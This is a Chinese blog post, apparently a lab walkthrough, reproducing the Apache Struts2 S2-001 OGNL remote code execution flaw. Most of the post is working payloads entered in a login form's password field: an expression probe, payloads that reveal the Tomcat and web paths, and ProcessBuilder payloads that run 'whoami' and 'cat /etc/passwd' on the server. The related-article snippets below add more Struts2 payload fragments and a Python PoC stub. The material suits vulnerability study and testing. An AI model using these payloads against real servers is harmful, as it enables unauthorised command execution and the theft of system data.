复现S2-001远程代码执行漏洞

最新推荐文章于 2023-07-16 15:56:13 发布
最新推荐文章于 2023-07-16 15:56:13 发布
阅读量180 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NLXHBM/article/details/124220386
版权

1.对漏洞进行测试,首先在password地方输入%{1+1}

点击submit之后,发现password 显示为2,证明漏洞存在

 

2.获取tomcat执行路径:

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

tomcatBinDir{/usr/local/tomcat}

3.获取Web路径:

%{

#req=@org.apache.struts2.ServletActionContext@getRequest(),

#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),

#response.println(#req.getRealPath('/')),

#response.flush(),

#response.close()

}

4.执行命令

%{

#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),

#b=#a.getInputStream(),

#c=new java.io.InputStreamReader(#b),

#d=new java.io.BufferedReader(#c),

#e=new char[50000],

#d.read(#e),

#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),

#f.getWriter().println(new java.lang.String(#e)),

#f.getWriter().flush(),#f.getWriter().close()

}

5. %{

#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),

#b=#a.getInputStream(),

#c=new java.io.InputStreamReader(#b),

#d=new java.io.BufferedReader(#c),

#e=new char[50000],

#d.read(#e),

#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),

#f.getWriter().println(new java.lang.String(#e)),

#f.getWriter()

}

 

 

 

NLXHBM
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Struts2 payload
code_lab
09-02 1937
Struts2S-016/S-017http://****.do?redirect:${%23w%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23w.println(%27it%20is%20vulerable.%27),%23w.flush(),%23w.cl
S2-007 远程代码执行漏洞
EC_Carrot的博客
08-07 604
漏洞简介 影响版本: 2.0.0 - 2.2.3 漏洞详细还是移步到这篇文章 漏洞复现 将exp传入可利用的age输入框里即可运行命令: ' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(
Apache Struts2远程代码执行漏洞(S2-001)复现
m0_58606546的博客
01-14 2436
0x01 漏洞概述 1、漏洞名称 漏洞名称:Struts Remote Code Exploit 漏洞编号:Struts2-001 漏洞类型:Remote Code Execution 2、漏洞原理 Struts2 是流行和成熟的基于 MVC 设计模式的 Web 应用程序框架。 Struts2 不只是 Struts1 下一个版本,它是一个完全重写的 Struts 架构。Struts2 的标签中使用的是OGNL表达式,OGNL 是 Object Graphic Navigation Language(
漏洞学习---S2-001 远程代码执行漏洞
qq_37698661的博客
06-17 323
漏洞原理 ​ 由于用户提交表单数据并且验证失败时,后端会将用户先前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据当中,在真实的测试环境中,遇到注册或登录界面,存在提交数据失败情况,则后端会返回之前提交的数据信息,若后端使用%{value}对提交的数据执行了OGNL表达式解析,那么可以利用这点,直接构造payload进行远程代码执行操作. 漏洞环境 #使用vulhub进行漏洞演示 /vulhub-master/struts2/s2-001 docker-compose b
S2-001漏洞分析
灰蜗牛
02-23 1185
Struts2是流行和成熟的基于MVC设计模式的Web应用程序框架。S2-001漏洞是由于 Struts 2 框架处理 HTTP 请求中某些参数的方式存在缺陷。具体来说,该框架无法正确验证这些参数中的用户输入,从而允许攻击者将恶意负载注入应用程序。有效负载可以包含应用程序处理请求时在服务器上执行的任意代码
s2-001漏洞复现
m0_74859491的博客
03-13 400
开启docker进入vulhub —struts2s2-001命令:cd vulhub/struts2/s2-001执行了payload 里的语句 pwd , 回显出路径:/usr/local/tomcat。(Readme.md 英文说明, Readme.zh-cn.md 中文说明)先查看说明文件 命令:cat Readme.zh-cn.md。3、启用测试环境:docker-compose up -d。回显出路径:/usr/local/tomcat。请参阅《中华人民共和国网络安全法》
struts2涉及上下文对象的设置取值问题
evilcry2012的专栏
09-13 1479
struts2涉及上下文对象的设置取值问题 2013-09-24 16:25 1956人阅读 评论(0) 收藏 举报  分类: 框架技术(2)  版权声明:本文为博主原创文章,未经博主允许不得转载。 目录(?)[+] Sturts2中:        前后台数据的通讯,不仅需要Struts2标签    ognl表
struts2漏洞以及测试
weixin_30767921的博客
07-18 142
# coding: utf-8 import string import random import urllib def poc(url):     bait = "".join(random.sample(list(string.letters), 32))     poc = urllib.q...
S2-001远程代码执行漏洞
qq_61702710的博客
07-16 545
漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。在输入账号或密码的位置构造payload。命令中的"pwd"可以随意替换。提交完可以看到命令被执行
0x1F. Apache Struts2远程代码执行漏洞(S2-001)复现
qq_31679787的博客
10-16 312
s2-001:WebWork 2.1+和Struts 2的“ altSyntax”功能允许将OGNL表达式插入文本字符串并进行递归处理。这允许恶意用户通常通过HTML文本字段提交包含OGNL表达式的字符串,如果表单验证失败,该字符串将由服务器执行; 通过账号处输入%{1+2}提交后得到返回值 3可判断出s2-001漏洞; 通过构造poc得到查看根目录,发现key文件; poc: %...
漏洞复现】---- S2-001远程代码执行漏洞
qq_43168364的博客
09-08 394
一、简介 该漏洞是因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式 (Struts框架使用OGNL作为默认的表达式语言,作用是对数据进行访问) %{value}进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败,后端一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL表达式解析,所以可以直接构造Payload进行命令执行。 我们来了解以下Struts2中的validation机制。validation依靠valida
S2-001漏洞复现
baidu_38844729的博客
11-14 382
漏洞原理 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 漏洞利用 切换到s2-001目录下,搭建启动测试环境 ...
cve-2022-30190 msdt远程代码执行漏洞复现
最新发布
09-10
这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值